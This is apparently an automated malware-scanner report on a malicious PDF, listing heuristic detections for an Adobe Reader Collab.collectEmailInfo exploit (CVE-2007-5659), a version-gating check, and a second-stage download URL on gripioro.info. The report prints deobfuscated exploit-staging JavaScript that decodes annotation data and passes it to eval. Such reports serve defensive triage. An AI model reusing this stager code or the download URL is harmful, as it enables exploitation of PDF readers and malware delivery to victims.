MALICIOUS
Risk Score: 266
Malware Insights
MITRE ATT&CK: T1059.001 PowerShell
The PDF file contains embedded JavaScript, indicated by multiple heuristic firings related to PDF JavaScript actions and streams. The extracted JavaScript files, particularly 'legacy_pdfkit_stage_000.js', are large and appear to be obfuscated, suggesting they are designed to perform complex malicious operations. The 'PDF_FOXIT_SYNCANNOTSCAN' heuristic further points to a technique where the PDF launcher decodes and evaluates JavaScript. The primary intent appears to be the execution of a second-stage payload via these scripts.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 9
- Collab.collectEmailInfo — CVE-2007-5659 (critical, CVE exact) [CVE_2007_5659]: PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
- JavaScript action (low, 4 related findings) [PDF_JAVASCRIPT]: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) (high, CVE likely) [PDF_JS_ADOBE_APSB08_13_PATCH_GATE]: PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  Matched line in script:
  var Ove55p__x = new Array();var T_8_wO7d = 0;var H82146xXe0d = "";function AL7XRrh3(j_pkA83, M_Fl76_wyp){var SS0__b_UY4 = M_Fl76_wyp.toString();var TD8X5B_W = "";for(var qYQ_xO___8 = 0; qYQ_xO___8 < SS0__b_UY4.length; qYQ_xO___8++) {var rg__M2L_e_1aWxx = parseInt(SS0__b_UY4.substr(qYQ_xO___8, 1));if (!isNaN(rg__M2L_e_1aWxx)) {rg__M2L_e_1aWxx = rg__M2L_e_1aWxx.toString(16);if (rg__M2L_e_1aWxx.length == 1) { rg__M2L_e_1aWxx = "0" + rg__M2L_e_1aWxx; }else if (rg__M2L_e_1aWxx.length != 2) { rg__M2L_ …
- PDF JavaScript exploit cluster (critical) [PDF_JS_EXPLOIT_CLUSTER]: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  Matched line in script:
  for (var i=0; i < list.length; i++) { result += String.fromCharCode(list[i] - jump); }
- PDF exploit shellcode contains an embedded download URL (high) [PDF_JS_SHELLCODE_DOWNLOAD_URL]: Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream (low) [PDF_JS]: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- syncAnnotScan annotation-staging primitive (low) [PDF_FOXIT_SYNCANNOTSCAN]: PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
- Suspicious extracted artifact (info) [EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://gripioro.info/page/index/n003106201r0409R59587819X3f65747eY5b74c9e5 (referenced by PDF JavaScript)
Extracted artifacts 4
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0004_000.js | pdf-javascript-stream | PDF /JS object 4 at offset 0xE1 | 1814 bytes |

SHA-256: b771a67801a2a024471cb29d8ce119b13dc98b5c56ef213dece7e1a5cc7b8bed

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 1 eval/decoder/string-building token(s).

Preview script: first 1,000 lines of the extracted script
function decrypt(str, jump){
    var result = "";
    var list = str.split(',');
    for (var i=0; i < list.length; i++) {
        result += String.fromCharCode(list[i] - jump);
    }
    return result;
}

| Filename | Kind | Source | Size |
|---|---|---|---|
| numeric_charcode_stage_000.js | deobfuscated-js | numeric char-code string decoded JavaScript at offset 0xEF | 469 bytes |

SHA-256: 4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 1 eval/decoder/string-building token(s).

Preview script: first 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';
app.doc.syncAnnotScan();
if (app.plugIns.length != 0) {
    var num = 1;
    pr = app.doc.getAnnots(
        {
            nPage: 0
        }
    );
    sum = pr[num].subject;
}
var buf = "";
if (app.plugIns.length > 3) {
    fnc += 'a';
    var arr = sum.split(/-/);
    for (var i = 1; i < arr.length; i++) {
        buf += String.fromCharCode("0x"+arr[i]);
    }
    fnc += 'l';
}
if (app.plugIns.length >= 2)
{
    app[fnc]/**/(buf);
}

| Filename | Kind | Source | Size |
|---|---|---|---|
| legacy_pdfkit_stage_000.js | deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0x1BCE | 11929 bytes |

SHA-256: a1e278df22599d140d302fbd3468a04770d7e881a1599fab3e7405036cbcdef1

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).

Preview script: first 1,000 lines of the extracted script
| Filename | Kind | Source | Size |
|---|---|---|---|
| legacy_pdfkit_stage_001.js | deobfuscated-js | nested inline base-23 callee-key decoded JavaScript at offset 0x1BCE | 4952 bytes |

SHA-256: 69e8204b2fae43f1b822726cf6b3623a78c75254ed168cfb145627604b447cc7

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 5 eval/decoder/string-building token(s).

Preview script: first 1,000 lines of the extracted script